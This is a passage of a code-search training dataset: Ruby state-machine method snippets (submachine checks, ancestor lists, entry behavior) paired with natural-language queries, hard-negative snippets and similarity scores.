"0.54641867",
"0.5461323",
"0.54600513",
"0.54476136",
"0.54392666",
"0.54371893",
"0.5423965",
"0.5404986",
"0.5400849",
"0.53965443",
"0.539283",
"0.53923315",
"0.539227",
"0.53888947",
"0.5382736",
"0.53638744",
"0.53631085",
"0.53624696",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53563446",
"0.5353917",
"0.5351263",
"0.53497165",
"0.53489757",
"0.5341021",
"0.5340633",
"0.5337397",
"0.5331163",
"0.53303",
"0.5312236",
"0.5310436"
] |
0.5853322
|
11
|
A state with isSubmachineState=true is said to be a submachine state. Such a state refers to a state machine (submachine). Default value is false.
|
def isSubmachineState
  # True when this state refers to a submachine; ! ! coerces the
  # reference into a plain Boolean.
  ! ! @submachine
end
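A quick illustration of the double-negation idiom: ! ! (usually written !!) maps nil and false to false and any other value to true, so the predicate returns a Boolean instead of leaking the submachine object. The values below are hypothetical.

@submachine = nil
! ! @submachine # => false

@submachine = Object.new # stand-in for a referenced StateMachine
! ! @submachine # => true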
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def state?(state)\n @_state == state\n end",
"def state?(state)\n @state == state\n end",
"def get_state\n return self.state == 't' || self.state == true\n end",
"def has_state?\n !!current_state\n end",
"def state?\n usa?\n end",
"def isComposite\n ! ! @submachine\n end",
"def is_state_machine(options = {}, &block)\n extend DataMapper::Is::StateMachine::EventDsl\n extend DataMapper::Is::StateMachine::StateDsl\n include DataMapper::Is::StateMachine::InstanceMethods\n\n # ===== Setup context =====\n options = { :column => :state, :initial => nil }.merge(options)\n column = options[:column]\n initial = options[:initial].to_s\n unless properties.detect { |p| p.name == column }\n property column, String, :default => initial\n end\n machine = Data::Machine.new(column, initial)\n @is_state_machine = { :machine => machine }\n\n # ===== Define callbacks =====\n # TODO: define callbacks\n # before :save do\n # if self.new_record?\n # # ...\n # else\n # # ...\n # end\n # end\n\n before :destroy do\n # Do we need to do anything here?\n end\n\n # ===== Setup context =====\n push_state_machine_context(:is)\n\n yield if block_given?\n\n # ===== Teardown context =====\n pop_state_machine_context\n end",
"def is_a_substate_of? x\n self.ancestors.include?(x)\n end",
"def has_state?\n !@states.empty?\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def manifestable_state?\n return true unless manages_state?\n workflow_class.manifest_states.include? Array.wrap(state).first.underscore\n end",
"def start_state?\n @state_type == :start\n end",
"def nested?\n !!state_or_event\n end",
"def state?(state)\n @states.key?(state)\n end",
"def current_state?(state) \n\t return state == current_state.to_sym\n\tend",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def stateful?\n true\n end",
"def current_state?(state)\n state == current_state.to_sym\n end",
"def running?\n @state == :running\n end",
"def terminal_state?\n self.class.terminal_states.include?(@state)\n end",
"def define_state_predicate; end",
"def desired_state?\n return true unless options.key?(:desired_state)\n\n options[:desired_state]\n end",
"def define_state_predicate\n name = self.name\n \n # Still use class_eval here instance of define_instance_method since\n # we need to be able to call +super+\n @instance_helper_module.class_eval do\n define_method(\"#{name}?\") do |*args|\n args.empty? ? super(*args) : self.class.state_machine(name).states.matches?(self, *args)\n end\n end\n end",
"def has_state?(v)\n@state[v]\nend",
"def state_machine\n @state_machine ||= SubProjectMachine.new(self, {\n transition_class: ProjectTransition\n })\n end",
"def ark_mintable_state?\n return false unless manages_state?\n workflow_class.ark_mint_states.include? Array.wrap(state).first&.underscore\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def running?; state == 'running'; end",
"def running?; state == 'running'; end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def advanced_state?\n @advanced_state.present?\n end",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def runtime_state?(sym); @runtime_states.include?(sym) end",
"def initialize_state?(object); end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def default_state_class?()\n \"SampleTransferPallet\"\n end",
"def running?\n (state == :running)\n end",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def state_machine()\n parse_sucess = false\n if event_block && optional_reset_block()\n # if event_block() && optional_reset_block() &&\n # optional_command_block() && state_list()\n parse_sucess = true\n end\n parse_sucess\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def final_state?\n current_state == final_state\n end",
"def running?\n self.reload\n self.virtual_machine_state == \"RUNNING\"\n end",
"def verify_as_current_state?\n true\n end",
"def default_state_class?()\n return nil\n end",
"def end_state?\n @state_type == :end\n end",
"def active?\n @state.active?\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def define_state_method(state)\n return if machine.respond_to?(\"#{state}?\")\n machine.send(:define_singleton_method, \"#{state}?\") do\n machine.is?(state.to_sym)\n end\n end",
"def perform_initial_transition?\n !current_state\n end",
"def initial?\n Machine[@target_class].initial_state_name == self.name\n end",
"def public_readable_state?\n return true unless manages_state?\n workflow_class.public_read_states.include? Array.wrap(state).first.underscore\n end",
"def running?\n return false if state.nil?\n \"running\".casecmp(state).zero?\n end",
"def workflow_state\n return false unless @curation_concern.respond_to? :workflow_state\n @curation_concern.workflow_state\n end",
"def sub_branch?\n !root?\n end",
"def machine?\n machine_flag != '0'\n end",
"def has_lifecycle?\n false\n end",
"def current?\n [machine.current, ANY_STATE].any? { |state| state == from_state }\n end",
"def running?\n @state == :started\n end",
"def operational?\n state == 'operational'\n end",
"def closed?\n state_name == \"closed\"\n end",
"def running?\n update_state()\n return @society_state == RUNNING\n end",
"def state_guard?(state_id)\n return false\n end",
"def valid_state?(state_class)\n state_class.is_a?(Class) && state_class < State\n end",
"def has_state(name)\n !@_possible_states[name].nil?\n end",
"def state_machine\n @state_machine ||= self.class.instantiate_state_machine_template\n end",
"def isInTransition()\n\t\t\treturn @_state == nil\n\t\tend",
"def toggle_state\n state\n end",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def waitingsecond?\n state_name == \"waitingsecond\"\n end",
"def options_changeable?\n network_state = @model_net_data.network_state\n if network_state == :state_on_localgame or\n network_state == :state_on_netgame\n return false\n else\n return true\n end\n end",
"def has_lifecycle?\n true\n end",
"def steady_state?(state)\n STATES[state] >= STEADY_STATE_THRESHOLD\n end",
"def new?\n @_state.nil?\n end",
"def is_transitioning?\n @is_transitioning\n end",
"def stopped?\n @state == :stopped\n end",
"def past_step_2?\n !spectator? && status_is_active?(\"events\")\n end",
"def running?\n return ![:deleted, :archived, :cancelled, :complete].include?(self.state)\n end",
"def for_startup?\n self.stage_id > 1\n end",
"def state\n s = self[:saved_state].to_sym\n if s == :running\n stop ? :cancelling : :running\n else\n s\n end\n end",
"def s\n @state_wrapper ||= EntwinedWrapperObject.new(@subgame_state.state, @subgame_state)\n end",
"def state_machine \r\n \r\n # Give the statemachine the statestore, its used in random walks etc\r\n @state_machine.adjacency_matrix=create_adjacency_matrix(@temp_transition_list)\r\n @state_machine.states_store=self.states_store\r\n\t\t@state_machine.guarded_actions=@guards\r\n return @state_machine\r\n end",
"def is_sub?\n @sub\n end",
"def child?\n false\n end",
"def running?\n @child && @child.running?\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def transition?\n current.transition?\n end",
"def boolean!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 16 )\n\n\n\n type = BOOLEAN\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 37:10: 'estado'\n match( \"estado\" )\n\n\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 16 )\n\n\n end",
"def enum?\n false\n end",
"def is_running?\n @running\n end",
"def has_bool_state\n params.require(:state)\n if ! params[:state].in? [\"true\", \"false\"]\n head :bad_request\n end\n params[:state] = ActiveModel::Type::Boolean.new.cast(params[:state])\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end"
] |
[
"0.6294503",
"0.6210016",
"0.6182318",
"0.6178241",
"0.61162686",
"0.61064464",
"0.6078177",
"0.6032297",
"0.60144484",
"0.60070306",
"0.59886426",
"0.5981271",
"0.59673",
"0.59620607",
"0.5946726",
"0.5945685",
"0.5945685",
"0.5914703",
"0.5874971",
"0.58738726",
"0.5859875",
"0.58317465",
"0.5816138",
"0.5780592",
"0.5747768",
"0.5731744",
"0.57257456",
"0.56285566",
"0.56231457",
"0.56231457",
"0.56231004",
"0.56108737",
"0.56098485",
"0.5593943",
"0.5562879",
"0.5547808",
"0.5547808",
"0.5543986",
"0.5542712",
"0.5538319",
"0.5534557",
"0.552645",
"0.55060893",
"0.54959923",
"0.5491851",
"0.5488221",
"0.5458683",
"0.5449889",
"0.54433495",
"0.54255193",
"0.5425508",
"0.54167116",
"0.54125094",
"0.5398592",
"0.5395449",
"0.53613186",
"0.5349323",
"0.5332282",
"0.5319171",
"0.5313964",
"0.53121954",
"0.5310757",
"0.52988684",
"0.5288508",
"0.5278177",
"0.52660334",
"0.52654594",
"0.5240478",
"0.5230656",
"0.5226096",
"0.52233636",
"0.52232206",
"0.52139896",
"0.5205715",
"0.52053285",
"0.52037835",
"0.51977307",
"0.51889753",
"0.51865023",
"0.5183354",
"0.51668656",
"0.51664454",
"0.5165775",
"0.516367",
"0.51559865",
"0.51503253",
"0.51472443",
"0.51472443",
"0.51472443",
"0.5140226",
"0.51397586",
"0.5135055",
"0.5131617",
"0.5131329",
"0.51191604",
"0.51191604",
"0.51191604",
"0.51191604",
"0.51191604",
"0.51191604"
] |
0.8428747
|
0
|
Returns a NamedArray of all ancestor States. self is the first element.
|
def ancestors
  # Memoized: the chain is built once and reused.
  @ancestors ||=
    begin
      x = [ self ]              # self is always the first element
      if ss = superstate
        x.push(*ss.ancestors)   # recurse up the superstate chain
      end
      NamedArray.new(x.freeze, :state)
    end
end
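A hedged usage sketch with stand-in objects: three nested states, leaf inside mid inside root. The Struct below only mimics the superstate/ancestors contract, and NamedArray is assumed to behave like an Array keyed by state name; none of these names come from the library itself.

SketchNode = Struct.new(:name, :superstate) do
  def ancestors
    superstate ? [self, *superstate.ancestors] : [self]
  end
end

root = SketchNode.new(:root, nil)
mid  = SketchNode.new(:mid,  root)
leaf = SketchNode.new(:leaf, mid)

leaf.ancestors.map(&:name) # => [:leaf, :mid, :root]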
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ancestors\n []\n end",
"def all_active_states\n return [] unless __is_current__?\n return [self] if @substates.empty?\n\n @substates.reduce([]) do |arr, substate|\n arr.concat(substate.all_active_states) if substate.__is_current__? # concat mutates ;)\n arr\n end\n end",
"def ancestors\n []\n end",
"def ancestors\n ancestors = []\n current_ancestor = self\n \n while !current_ancestor.nil?\n \n if current_ancestor.respond_to?(:parent)\n ancestors << current_ancestor\n current_ancestor = current_ancestor.parent\n else\n current_ancestor = nil\n end\n \n end\n \n ancestors\n end",
"def ancestors\n parents = []\n\n this_parent = self.parent\n\n while this_parent != nil\n parents << this_parent\n this_parent = this_parent.parent\n end\n parents\n end",
"def states\n @finity.states.map { |name, _| name }\n end",
"def ancestors\n itr = self\n res = []\n until itr.top_level?\n itr = itr.parents.first\n res << itr\n end\n res\n end",
"def ancestors\n @ancestors ||= [self] + (self.parent.try(:ancestors) || [])\n end",
"def ancestors\n @ancestors ||= parent ? parent.ancestors + [parent] : []\n end",
"def ancestors\n if parent.nil?\n []\n else\n parent.ancestors + [parent]\n end\n end",
"def ancestors\n parent ? [parent, *parent.ancestors].reverse : []\n end",
"def ancestors\n parents + parents.map(&:ancestors).flatten\n end",
"def ancestors\n node_ancestors.map(&:ancestor)\n end",
"def ancestors\n parent ? [parent, parent.ancestors].flatten : []\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def to_a\n @_states.values\n end",
"def ancestors\n return [] if root?\n tree_search_class.find(self[tree_path_field])\n end",
"def ancestors\n \tif parent_name.blank?\n\t \tancestors = [] \n \telse\n \t\tp = Category.where(name: parent_name).first\n \t\tancestors = p.ancestors\n \t\tancestors << parent_name\n \tend\n \tancestors\n end",
"def states\r\n return @states.uniq\r\n end",
"def self_and_ancestors\n \t\tres = [self] + self.ancestors\n \t\treturn res.uniq\n \tend",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n self_and_ancestors - [self]\n end",
"def ancestors; end",
"def ancestors; end",
"def ancestors; end",
"def ancestors; end",
"def ancestors \n \t\tres=parents\n \t\tparents.each {|c| res += c.ancestors}\n \t\treturn res.uniq\n \tend",
"def ancestors(scope = {})\n self_and_ancestors(scope) - [self]\n end",
"def ancestors() end",
"def matching_ancestors\n []\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n self.class.ancestors_of(self)\n end",
"def ancestor_ids\n read_attribute(self.base_class.ancestry_column).to_s.split(%r|[,/]|).uniq.map { |id| cast_primary_key(id) }\n end",
"def ancestors\n end",
"def ancestors\n model_base_class.scoped(:conditions => ancestor_conditions, :order => :ancestry_string)\n end",
"def ancestors\n @cache[:ancestors]\n end",
"def ancestors\n self.root? ? [] : self.parent.ancestors_and_self\n end",
"def all_ancestor_ids\n ancestors.pluck(:id)\n end",
"def states\n []\n end",
"def states\n []\n end",
"def to_array\n parents = []\n\n top_array = [self]\n c_arr = top_array\n\n self.class.base_class.each_with_level(descendants.includes(:link => :linkable)) do |menu, level|\n case level <=> parents.count\n when 0 # same level\n # set current array as new sibling array containing menu\n c_arr = [menu] \n\n # and push current array (the new sibling array) to current parent\n parents.last[1] << c_arr \n\n when 1 # descend\n # push a child array if the current level does no thave one\n c_arr << [] if c_arr.length == 1\n \n # and push the sibling array into that array\n c_arr[1] << [menu]\n\n # push the current array to be the current parent\n parents << c_arr\n\n # and reset the current as the new child array\n c_arr = c_arr[1].last\n\n when -1 # ascend\n # pop parents up to the parent of the new menu\n parents.pop while parents.count > level\n\n # and proceed to add new sibling as though level had been 0\n c_arr = [menu]\n parents.last[1] << c_arr\n end\n end\n\n top_array\n end",
"def ancestors_r(*args)\n # fetch all parents\n pending = [self]\n ans = []\n while !pending.empty?\n e = pending.pop\n e.parents(*args).each do |p|\n if !ans.include?(p)\n ans << p\n pending.push(p)\n end\n end\n end\n ans\n end",
"def branches\n if ancestor_ids.empty? then\n nil\n else\n read_attribute(self.base_class.ancestry_column).to_s.split(',')\n end\n end",
"def all_ancestors(ancestors=[])\n # Assumes only one parent\n result = []\n c = self\n while c && c.parent_groups\n result += c.parent_groups\n c = c.parent_groups[0]\n end\n result\n end",
"def ancestors_ids\n node, nodes = self, []\n while node.parent\n node = node.parent\n nodes << node.id\n end\n nodes\n end",
"def taxons_with_ancestors\n taxons.flat_map(&:breadcrumb_trail)\n end",
"def ancestors\n (parent ? parent.ancestors : []) << self\n end",
"def ancestors_of klass\n ancestors = []\n unexamined = [klass]\n seen = []\n loop do\n break if unexamined.empty?\n current = unexamined.shift\n seen << current\n stores = classes[current]\n break unless stores and not stores.empty?\n klasses = stores.map do |store|\n store.ancestors[current]\n end.flatten.uniq\n klasses = klasses - seen\n ancestors.push(*klasses)\n unexamined.push(*klasses)\n end\n ancestors.reverse\n end",
"def states; @_hegemon_states.keys; end",
"def ancestors\n model_base_class.where(ancestor_conditions).order(:materialized_path)\n end",
"def ancestors_of klass\n ancestors = []\n\n unexamined = [klass]\n seen = []\n\n loop do\n break if unexamined.empty?\n current = unexamined.shift\n seen << current\n\n stores = classes[current]\n\n next unless stores and not stores.empty?\n\n klasses = stores.flat_map do |store|\n store.ancestors[current] || []\n end.uniq\n\n klasses = klasses - seen\n\n ancestors.concat klasses\n unexamined.concat klasses\n end\n\n ancestors.reverse\n end",
"def states\r\n @states.collect {|id| $data_states[id] }\r\n end",
"def path_states\n @__cache__[:path] ||= @superstate ? [*@superstate.path_states, self] : [self] # recursion\n end",
"def all_children(scope = {})\n full_set(scope) - [self]\n end",
"def all_active_paths\n all_active_states.map(&:path)\n end",
"def self_and_ancestors\n ancestors + [self]\n end",
"def ancestors\n @space.ancestors\n end",
"def ancestors\n return @ancestors unless @ancestors.nil?\n # Stop if this is already the root node\n return @ancestors = [self] if File.basename(tree).empty?\n # Path for parent is blank if parent is root node\n parent_path = if File.dirname(tree) == '.'\n \"\"\n # Otherwise it is the directory in which this node is located\n else\n File.dirname tree\n end\n parent = git_flow_repo.working_file parent_path\n @ancestors = parent.ancestors + [ self ]\n end",
"def graph_states\n self.graph.states\n end",
"def get_children_array\n\t\t\tarr = []\n\t\t\tself.children.get_active.each do |child_1|\n\t\t\t\tarr << {menu: child_1, class: 'parent'}\n\t\t\t\tchild_1.children.get_active.each do |child_2|\n\t\t\t\t\tarr << {menu: child_2, class: 'child'}\n\t\t\t\tend\n\t\t\tend\n\t\t\tarr\n\t\tend",
"def ancestors\n if @hash.values.include? :null\n s = []\n build_hash = proc do |attributes, current_hypothesis|\n if attributes.empty?\n s << self.class.new(Hash[*current_hypothesis])\n else\n attributes[0].each do |value|\n build_hash[attributes[1..attributes.length], current_hypothesis + value]\n end\n end\n end\n build_hash[attributes.map { |key, values| values.map { |value| [key, value] } }, []]\n return s\n else\n @hash.select { |attr, value| value != :undefined }.map do |attr, value|\n self.class.new(@hash.merge({ attr => :undefined }))\n end\n end\n end",
"def states\n @states ||= {}\n end",
"def all_state_keys\r\n @state_keys.keys\r\n end",
"def all_in_tree\n accounts = Array.new\n accounts += ancestors\n accounts += sibling_accounts\n accounts += children\n accounts << self\n return accounts\n end",
"def ancestors\n without_self self_and_ancestors\n end",
"def ancestors_for(namespace)\n ancestors = []\n current = namespace\n\n while current&.parent_id\n # We're using find_by(id: ...) here to deal with cases where the\n # parent_id may point to a missing row.\n current = Namespace.unscoped.select([:id, :parent_id])\n .find_by(id: current.parent_id)\n\n ancestors << current.id if current\n end\n\n ancestors\n end",
"def ancestors(options={})\n @ancestors ||= begin\n return [] if top_level?\n objects = self.class.ancestors_of(self).scoped(options).group_by(&:id)\n index_path.map { |id| objects[id].first }\n end\n end",
"def self_and_ancestors\n ancestors + [self]\n end",
"def known_states\n branch.known_states\n end",
"def netzke_ancestors\n if self == Netzke::Base\n []\n else\n superclass.netzke_ancestors + [self]\n end\n end",
"def state_keys\n @state.keys\n end",
"def ancestors(options={})\n return [] if top_level?\n objects = self.class.ancestors_of(self).scoped(options).group_by(&:id)\n index_path.map { |id| objects[id].first }\n end",
"def each_ancestor # :nodoc:\n end",
"def descendents\n respond_to?(:values) ? values.map { |d| d.branch }.flatten : []\n end",
"def states\n states = Set.new([@initial_state])\n @transitions.each { |k,v| states += v.values }\n states\n end",
"def event_names\n @event_names ||= @states.collect do |_, state|\n state.events.keys\n end.flatten.uniq\n end",
"def each_ancestor\n ancestors = [self]\n while not ancestors.last.parent.nil?\n ancestors << ancestors.last.parent\n end\n ancestors.reverse_each { |a| yield a }\n end",
"def ancestry_setup\n ancestors.map { |suite| suite.setup }.flatten.reverse\n end",
"def hierarchy\n p = self\n h = []\n while(p.parent != nil)\n h = [p] + h\n p = p.parent\n end\n h = [p] + h\n \n h\n end",
"def children_names; @children.keys; end",
"def branches\n if ancestor_ids.empty? then\n nil\n else\n read_attribute(self.base_class.structure_column).to_s.split(',')\n end\n end",
"def available_states # :nodoc:\n if @states\n return @states\n end\n end",
"def ancestors(labels=[])\n ancs = []\n if primary_label and !labels.include?(primary_label.id)\n ancs << primary_label\n ancs = primary_label.ancestors(labels << primary_label.id) + ancs\n end\n ancs\n end",
"def ancestors\n records = self_and_ancestors - [self]\n\n scope = self_and_ancestors.where(arel[:id].not_eq(id))\n scope.records(records)\n end",
"def to_array\n children.each_with_object( [ self ] ) { |child, memo|\n memo.concat( child.to_array )\n }.flatten\n end",
"def hierarchy\n parents = []\n parent = self.parent\n\n while parent && !parent.parent_id.nil?\n parents << parent\n parent = parent.parent\n end\n\n return parents.reverse\n end",
"def full_hierarchy\n hierarchy = []\n current_location = self\n hierarchy << current_location.name\n while(1)\n if (current_location.location)\n location = current_location.location\n hierarchy << location.name\n current_location = location\n else\n break\n end\n end\n hierarchy.reverse.map {|h| h}.join(\", \")\n end",
"def all\n # return an array of all the regions\n return NAMES\n end",
"def ancestors(child_flow = self)\n parents = []\n parents << child_flow\n parents << child_flow.parent_steps.map { |s| ancestors(s.flow) } if child_flow.parent_steps.present?\n parents.flatten.uniq\n end",
"def all_groups\n result = Array.new\n \n for group in self.groups\n result << group.ancestors_and_self\n end\n \n result.flatten!\n result.uniq!\n \n return result\n end",
"def us_states\n response = get('AllUSStates')\n StoreStatesSerializer.new([]).from_xml(response) #.map(&:state)\n end",
"def ancestor_types\n self[\"ancestors\"].collect { |hash| hash[\":type\"].split(\"+\").first.split(\"/\", 2).last }\n end",
"def parents\n if parent.nil?\n [self]\n else\n parent.parents + [self]\n end\n end",
"def generate_ancestor_list(c)\n c.ancestors.find_all { |a| a != c }\n end",
"def get_state\n@state.keys\nend",
"def ancestor_map ignore=[]\n \t\tif ignore.include? self\n\t\t\tif next_etymon.present? && !(ignore.include?(next_etymon))\n\t\t\t\treturn [ { self => {} }, next_etymon.ancestor_map(ignore) ]\n\t\t\telse\n\t\t\t\treturn { self => {} } \n\t\t\tend\n \t\tend\n \n ignore << self\n parent_etym = primary_parent\n \n selfmap = parent_etym ? { self => parent_etym.ancestor_map(ignore) } : { self => {} }\n next_etymon ? [selfmap, next_etymon.ancestor_map(ignore)] : selfmap\n end",
"def self_and_parent_menus(options={})\n\t\t\tarr = [self]\n\t\t\tfather = self.parent\n\t\t\twhile father.present?\n\t\t\t\tarr << father\n\t\t\t\tfather = father.parent\n\t\t\tend\n\n\t\t\treturn arr.reverse\n\t\tend",
"def all_parents\n parents(all: true)\n end"
] |
[
"0.7137159",
"0.70319986",
"0.68577975",
"0.67584234",
"0.67583287",
"0.66906005",
"0.6610407",
"0.65746146",
"0.6526029",
"0.65129197",
"0.6512119",
"0.648894",
"0.6464761",
"0.6456015",
"0.6425596",
"0.64116263",
"0.6409109",
"0.6406646",
"0.6396961",
"0.6374533",
"0.63512427",
"0.63512427",
"0.63308024",
"0.6307654",
"0.6307654",
"0.6307654",
"0.6307654",
"0.63038445",
"0.62866336",
"0.6262321",
"0.62340367",
"0.62259376",
"0.62259376",
"0.62114435",
"0.6198317",
"0.61856943",
"0.6168313",
"0.6150256",
"0.61490595",
"0.61372566",
"0.61158305",
"0.61158305",
"0.6080731",
"0.60699445",
"0.6057343",
"0.6011861",
"0.601136",
"0.6010184",
"0.5977391",
"0.59728897",
"0.5964073",
"0.59627247",
"0.594927",
"0.59372884",
"0.5906197",
"0.5905818",
"0.59002334",
"0.58937997",
"0.58778346",
"0.58778065",
"0.58663696",
"0.5865551",
"0.5855935",
"0.58429253",
"0.58415747",
"0.5827808",
"0.5792701",
"0.5782931",
"0.5782248",
"0.57698727",
"0.5763513",
"0.57589453",
"0.5751922",
"0.57494015",
"0.57315135",
"0.5730504",
"0.571142",
"0.570653",
"0.56948614",
"0.56898576",
"0.5684307",
"0.56800973",
"0.567509",
"0.56437314",
"0.5635178",
"0.5630173",
"0.5626893",
"0.5617895",
"0.5616402",
"0.5607729",
"0.56048495",
"0.5604666",
"0.5601132",
"0.559852",
"0.55929065",
"0.55928975",
"0.5582717",
"0.5572766",
"0.5563409",
"0.5562928"
] |
0.80961573
|
0
|
Called by Machine when State is entered.
|
def entry! machine, args
  # Dispatch this state's :entry behavior when the machine enters it.
  _behavior! :entry, machine, args
end
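A hedged sketch of the calling side: during a transition, a machine would typically run the old state's exit behavior, switch states, then call entry! on the new state. SketchMachine and the exit! call are assumptions modeled on the snippet above, not the library's confirmed API.

class SketchMachine
  attr_reader :state

  def transition_to(new_state, *args)
    @state.exit!(self, args) if @state # leave the old state first
    @state = new_state
    @state.entry!(self, args)          # then run the new state's entry behavior
  end
end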
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def enter_state\n end",
"def pre_enter(state_manager, game)\n # puts \"State : #{self.class}\"\n @exiting = false\n end",
"def enter!\n @state_machine.current_state = self\n\n @entry_actions.each do |entry_action|\n entry_action.call(@state_machine)\n end\n @transition_map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:arm)\n end\n end\n end",
"def enter(state_manager, game)\n end",
"def enter_state\n puts \"Entering #{self.class}\"\n execution_state = EXECUTION_STATE[:active]\n end",
"def on_enter\n end",
"def trigger!\n\treturn if (@next_state_name == nil)\n\n\tcurrent_state = nil\n current_state = @states.fetch(@current_state_name) unless @current_state_name.nil?\n\n\tnext_state = @states.fetch(@next_state_name)\n next_state_name = @next_state_name\n\n\t@next_state_name = nil\n\n\tcurrent_state.atexit if(current_state.respond_to?(:atexit))\n\t@current_state_name = next_state_name\n\tnext_state.atentry if(next_state.respond_to?(:atentry))\n end",
"def on_state_begin(state_id)\n end",
"def state\n end",
"def state_changed\n @state_condition.signal @state\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def on_enter\n @state = :HIGHLIGHTED # duplicating since often these are inside containers\n @focussed = true\n if @handler && @handler.has_key?(:ENTER)\n fire_handler :ENTER, self\n end\n end",
"def on_enter\n raise \"Cannot enter Label\"\n end",
"def on_state(state, &block)\n end",
"def on_enter\n ## Form has already set this, and set modified to false\n @state = :HIGHLIGHTED # duplicating since often these are inside containers\n #@focussed = true\n if @handler && @handler.has_key?(:ENTER)\n fire_handler :ENTER, self\n end\n end",
"def update_state\n raise \"Nothing to do\"\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def enter\n puts \"CUSTOMER HAS ENTERED, LOCK GATE AGAIN\"\n @gate.change_state(ClosedGateState.new(@gate))\n end",
"def state_machine()\n parse_sucess = false\n if event_block && optional_reset_block()\n # if event_block() && optional_reset_block() &&\n # optional_command_block() && state_list()\n parse_sucess = true\n end\n parse_sucess\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def before_state(state)\n end",
"def game_state\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def states; end",
"def after_state(state)\n end",
"def start\n @state_machine.startup\n end",
"def on_entry(in_state: nil, &block)\n end",
"def exit_state\n end",
"def setup_state_machine\n @line_number = 1\n reset_reading\n end",
"def on_state_timeup(state_id)\n end",
"def execState\n findNextState\n current_state = @state_list[@state][@transition]\n\n @transition = eval \"#{@state}\"\n @history.push @state\n\n @finished = @state == :finish\n end",
"def fire_state_changed\n @sce = ChangeEvent.new(self) if @sce.nil?\n fire_handler :STATE_CHANGE, @sce\n end",
"def init_state_handler\n set_state_handler(:start)\n set_state_handler(:change)\n set_state_handler(:player)\n set_state_handler(:enemy)\n set_state_handler(:friend)\n set_state_handler(:over)\n end",
"def live\r\n @state=1\r\n end",
"def on_leave\n @_entered = false\n super\n end",
"def state\n @state\n end",
"def enter_pending; end",
"def run\n @state.run(self)\n end",
"def state_added! statemachine\n transitions_changed!\n end",
"def state\n @state\n end",
"def state\n @state\n end",
"def on_enter\n # if BTAB, the last comp XXX they must be focusable FIXME\n if $current_key == KEY_BTAB || $current_key == KEY_UP\n @current_component = @focusables.last\n elsif $current_key == KEY_TAB || $current_key == KEY_DOWN\n @current_component = @focusables.first\n else\n # let current component be, since an unhandled key may have resulted\n # in on_enter being called again\n end\n return unless @current_component\n $log.debug \" STACKFLOW came to ON_ENTER #{@current_component} \"\n set_form_row\n @_entered = true\n end",
"def state_code\n end",
"def jump_to_state(state)\n logger.debug \"STATE JUMP! to #{state}\"\n \n render_state(state)\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def initialize\n @state = :new\n end",
"def state_code\n end",
"def state=(state)\n if not STATES.include? state\n raise PreconditionError, \"Invalid game victory state.\"\n end\n super\n changed(true)\n notify_observers U_COMPLETED, state, self.currentPlayer\n if not self.state == state\n raise PostconditionError, \"State not set correctly.\"\n end\n self.state\n end",
